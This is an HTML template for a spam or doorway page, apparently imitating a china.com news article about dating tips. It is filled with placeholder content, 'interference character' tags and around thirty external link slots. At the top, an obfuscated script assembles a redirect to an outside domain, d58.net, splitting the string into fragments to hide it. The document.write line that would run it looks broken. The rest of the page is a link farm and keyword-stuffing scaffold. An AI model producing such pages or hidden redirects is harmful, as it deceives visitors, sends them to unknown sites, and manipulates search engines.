﻿<!doctype html>
<script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"d58"; xx=xx+"."; xx=xx+"net"; xx=xx+"'<\/sc"; xx=xx+"ript>"; \\document.write(xx); </script>
<html>
<head>
<meta charset="utf-8">
<title class='$干扰字符$'> $标题$：$副标题1$_约会秘籍</title>
<link class='$干扰字符$' href="http://news.china.com/etc/endpage/css1312/style.css" rel="stylesheet" media="all" />
</head>
<body class='$干扰字符$'>

<div name='$干扰字符$' id="chan_mainBlk" class="clearfix"> 
  <div class='$干扰字符$' id="chan_mainBlk_lft"> 
    <div class='$干扰字符$' id="chan_newsBlk"> 
      <h1 class='$干扰字符$' id="chan_newsTitle">$标题$：$副标题1$</h1>
      <div class='$干扰字符$' id="chan_newsInfo">
        <div id='$干扰字符$' class="chan_newsInfo_link">


<div id='$干扰字符$' class="cn_share">
	<span id='$干扰字符$' class="custom_item weixin"></span>
	<a id='$干扰字符$' title="分享到新浪微博" class="sinaminiblog" href="javascript:void(0);"></a>
	<a id='$干扰字符$' title="分享到QQ空间" class="qzone" href="javascript:void(0);"></a>
	<a id='$干扰字符$' title="分享到腾讯微博" class="qqmb" href="javascript:void(0);"></a>
</div>

        </div>
        $时间$ <a class='$干扰字符$' href='' target='blank'>约会秘籍</a> &nbsp; &nbsp;参与评论$数字1$人</a></span>
      </div>
      <div class='$干扰字符$' id="chan_newsDetail">
        <p class='$干扰字符$'>
          <img class='$干扰字符$' src="$图片1$">
        </p>  
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容1$$内容2$$内容3$$标题$，$内容4$
</p>
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容5$$内容6$$内容7$
</p>
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容12$$内容13$$内容14$
</p>
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容15$$内容16$
</p>
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容15$$内容16$
</p>
<p class='$干扰字符$'>&nbsp;&nbsp;&nbsp;
$内容17$$标题$，$内容18$
</p>
<!--##links##-->
</div></div><div id='$干扰字符$' style='width:240px;background:#bbf;position:absolute;top:180px;left:850px;'>
<table id='$干扰字符$'>
<tr id='$干扰字符$'>
<script>
function liover(lid) {
  tarlk=document.getElementById("links1");
  tarlk.style.display="none";
  tarlk=document.getElementById("links2");
  tarlk.style.display="none";
  tarlk=document.getElementById("links3");
  tarlk.style.display="none";
  tarlk=document.getElementById("links4");
  tarlk.style.display="none";
  tarlk=document.getElementById(lid);
  tarlk.style.display="";
}
</script>
<td id='$干扰字符$' align='center' width='59px' onmouseover='liover("links1")'>国内新闻</td>
<td id='$干扰字符$' align='center' width='59px' onmouseover='liover("links2")'>国外新闻</td>
<td id='$干扰字符$' align='center' width='59px' onmouseover='liover("links3")'>体育新闻</td>
<td id='$干扰字符$' align='center' width='59px' onmouseover='liover("links4")'>友情链接</td>
</tr></table>
</div><div id='links1' style='display:;width:240px;background:#eef;position:absolute;top:200px;left:850px;'>
<a id='$干扰字符$' href='$外链1$'>$副标题31$</a>$随机日期1$</br>
<a id='$干扰字符$' href='$外链2$'>$副标题2$</a>$随机日期2$</br>
<a id='$干扰字符$' href='$外链3$'>$副标题3$</a>$随机日期3$</br>
<a id='$干扰字符$' href='$外链4$'>$副标题4$</a>$随机日期4$</br>
<a id='$干扰字符$' href='$外链5$'>$副标题5$</a>$随机日期5$</br>
<a id='$干扰字符$' href='$外链6$'>$副标题6$</a>$随机日期6$</br>
</div><div id='links2' style='display:none;width:240px;background:#eef;position:absolute;top:200px;left:850px;'>
<a id='$干扰字符$' href='$外链7$'>$副标题7$</a>$随机日期7$</br>
<a id='$干扰字符$' href='$外链8$'>$副标题8$</a>$随机日期8$</br>
<a id='$干扰字符$' href='$外链9$'>$副标题9$</a>$随机日期9$</br>
<a id='$干扰字符$' href='$外链10$'>$副标题10$</a>$随机日期10$</br>
<a id='$干扰字符$' href='$外链11$'>$副标题11$</a>$随机日期11$</br>
<a id='$干扰字符$' href='$外链12$'>$副标题12$</a>$随机日期12$</br>
<a id='$干扰字符$' href='$外链13$'>$副标题13$</a>$随机日期13$</br>
<a id='$干扰字符$' href='$外链14$'>$副标题14$</a>$随机日期14$</br>
<a id='$干扰字符$' href='$外链15$'>$副标题15$</a>$随机日期15$</br>
</div><div id='links3' style='display:none;width:240px;background:#eef;position:absolute;top:200px;left:850px;'>
<a id='$干扰字符$' href='$外链16$'>$副标题16$</a>$随机日期16$</br>
<a id='$干扰字符$' href='$外链17$'>$副标题17$</a>$随机日期17$</br>
<a id='$干扰字符$' href='$外链18$'>$副标题18$</a>$随机日期18$</br>
<a id='$干扰字符$' href='$外链19$'>$副标题19$</a>$随机日期19$</br>
<a id='$干扰字符$' href='$外链20$'>$副标题20$</a>$随机日期20$</br>
<a id='$干扰字符$' href='$外链21$'>$副标题21$</a>$随机日期21$</br>
<a id='$干扰字符$' href='$外链22$'>$副标题22$</a>$随机日期22$</br>
<a id='$干扰字符$' href='$外链23$'>$副标题23$</a>$随机日期23$</br>
<a id='$干扰字符$' href='$外链24$'>$副标题24$</a>$随机日期24$</br>
</div><div id='links4' style='display:none;width:240px;background:#eef;position:absolute;top:200px;left:850px;'>
<a id='$干扰字符$' href='$外链25$'>$副标题25$</a>$随机日期25$</br>
<a id='$干扰字符$' href='$外链26$'>$副标题26$</a>$随机日期25$</br>
<a id='$干扰字符$' href='$外链27$'>$副标题27$</a>$随机日期27$</br>
<a id='$干扰字符$' href='$外链28$'>$副标题28$</a>$随机日期28$</br>
<a id='$干扰字符$' href='$外链29$'>$副标题29$</a>$随机日期29$</br>
<a id='$干扰字符$' href='$外链30$'>$副标题30$</a>$随机日期30$</br>
</div>
<div id='$干扰字符$'><div id='$干扰字符$'>
</div></div></div></div></body></html>